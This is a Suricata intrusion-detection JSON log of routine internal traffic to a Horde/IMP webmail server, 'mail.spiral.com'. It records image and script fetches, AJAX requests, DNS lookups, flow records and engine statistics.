{"timestamp":"2020-02-29T00:23:14.042385+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":8}} {"timestamp":"2020-02-29T00:23:14.042940+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195},"app_proto":"http","fileinfo":{"filename":"\/js\/jstorage.js","state":"CLOSED","stored":false,"size":14289,"tx_id":1}} {"timestamp":"2020-02-29T00:23:14.055569+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} 
{"timestamp":"2020-02-29T00:23:14.056125+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} {"timestamp":"2020-02-29T00:23:14.056812+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} {"timestamp":"2020-02-29T00:23:14.057009+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":9}} 
{"timestamp":"2020-02-29T00:23:14.057388+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":2}} {"timestamp":"2020-02-29T00:23:14.057826+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:23:14.058591+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} 
{"timestamp":"2020-02-29T00:23:14.059277+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":3}} {"timestamp":"2020-02-29T00:23:14.060224+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":10}} {"timestamp":"2020-02-29T00:23:14.061891+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:23:14.062479+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":11}} {"timestamp":"2020-02-29T00:23:14.063474+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":15}} 
{"timestamp":"2020-02-29T00:23:14.101269+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} {"timestamp":"2020-02-29T00:23:14.105302+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} {"timestamp":"2020-02-29T00:23:14.105284+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} 
{"timestamp":"2020-02-29T00:23:17.000362+0000","event_type":"stats","stats":{"uptime":15049,"capture":{"kernel_packets":140100,"kernel_drops":0},"decoder":{"pkts":140123,"bytes":96193959,"invalid":195,"ipv4":138552,"ipv6":10,"ethernet":140123,"raw":0,"null":0,"sll":0,"tcp":133002,"udp":5340,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2879,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2895,"synack":2886,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1896,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2443,"failed_udp":116},"tx":{"http":4909,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2525}},"flow_mgr":{"closed_pruned":2854,"new_pruned":17,"est_pruned":2504,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":6,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65529,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17848,"memcap_state":0,"memcap_global":0},"http":{"memuse":139487,"memcap":0}}} 
{"timestamp":"2020-02-29T00:23:18.000476+0000","flow_id":706061179386444,"event_type":"flow","src_ip":"192.168.10.122","src_port":55199,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:17.555596+0000","end":"2020-02-29T00:18:17.664296+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:18.576630+0000","flow_id":1779901807041841,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52976,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/tinycon.js","state":"CLOSED","stored":false,"size":8214,"tx_id":0}} {"timestamp":"2020-02-29T00:23:19.062979+0000","flow_id":1327585916188998,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52974,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":12}} 
{"timestamp":"2020-02-29T00:23:19.064032+0000","flow_id":1553466836230670,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52978,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":4}} {"timestamp":"2020-02-29T00:23:19.066893+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":16}} 
{"timestamp":"2020-02-29T00:23:20.000471+0000","flow_id":65256369099473,"event_type":"flow","src_ip":"192.168.10.130","src_port":34270,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":33,"pkts_toclient":62,"bytes_toserver":3563,"bytes_toclient":80705,"start":"2020-02-29T00:22:11.398033+0000","end":"2020-02-29T00:22:16.434766+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:20.453231+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35494,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":21489,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:20.561932+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35494,"proto":"UDP","dns":{"type":"answer","id":21489,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:20.561932+0000","flow_id":655814376876655,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35494,"proto":"UDP","dns":{"type":"answer","id":21489,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:20.668550+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412}} {"timestamp":"2020-02-29T00:23:20.668550+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} {"timestamp":"2020-02-29T00:23:23.000290+0000","flow_id":574334532723092,"event_type":"flow","src_ip":"192.168.10.122","src_port":36137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:22.074132+0000","end":"2020-02-29T00:18:22.182286+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:23.000546+0000","flow_id":773543705896811,"event_type":"flow","src_ip":"192.168.10.122","src_port":59659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:22.255851+0000","end":"2020-02-29T00:18:22.365114+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:23:24.000208+0000","event_type":"stats","stats":{"uptime":15056,"capture":{"kernel_packets":140139,"kernel_drops":0},"decoder":{"pkts":140146,"bytes":96197273,"invalid":195,"ipv4":138573,"ipv6":10,"ethernet":140146,"raw":0,"null":0,"sll":0,"tcp":133021,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2505,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":40078,"memcap":0}}} 
{"timestamp":"2020-02-29T00:23:25.669546+0000","flow_id":96399181527716,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52980,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":770,"tx_id":0}} {"timestamp":"2020-02-29T00:23:31.000213+0000","event_type":"stats","stats":{"uptime":15063,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":
116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} {"timestamp":"2020-02-29T00:23:38.000217+0000","event_type":"stats","stats":{"uptime":15070,"capture":{"kernel_packets":140147,"kernel_drops":0},"decoder":{"pkts":140149,"bytes":96197471,"invalid":195,"ipv4":138576,"ipv6":10,"ethernet":140149,"raw":0,"null":0,"sll":0,"tcp":133024,"udp":5342,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2880,"ssn_memcap_drop":0,"pseudo":351,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2896,"synack":2887,"rst":1214,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1897,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2444,"failed_udp":116},"tx":{"http":4910,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2526}},"flow_mgr":{"closed_pruned":2855,"new_pruned":17,"est_pruned":2507,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,
"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17185,"memcap_state":0,"memcap_global":0},"http":{"memuse":960,"memcap":0}}} {"timestamp":"2020-02-29T00:23:38.001500+0000","flow_id":1879111253891026,"event_type":"flow","src_ip":"192.168.10.81","src_port":52966,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":784,"bytes_toclient":908,"start":"2020-02-29T00:22:32.464850+0000","end":"2020-02-29T00:22:37.472548+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:38.001723+0000","flow_id":503789711071144,"event_type":"flow","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":61,"pkts_toclient":77,"bytes_toserver":10547,"bytes_toclient":94902,"start":"2020-02-29T00:22:29.464808+0000","end":"2020-02-29T00:22:37.767328+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 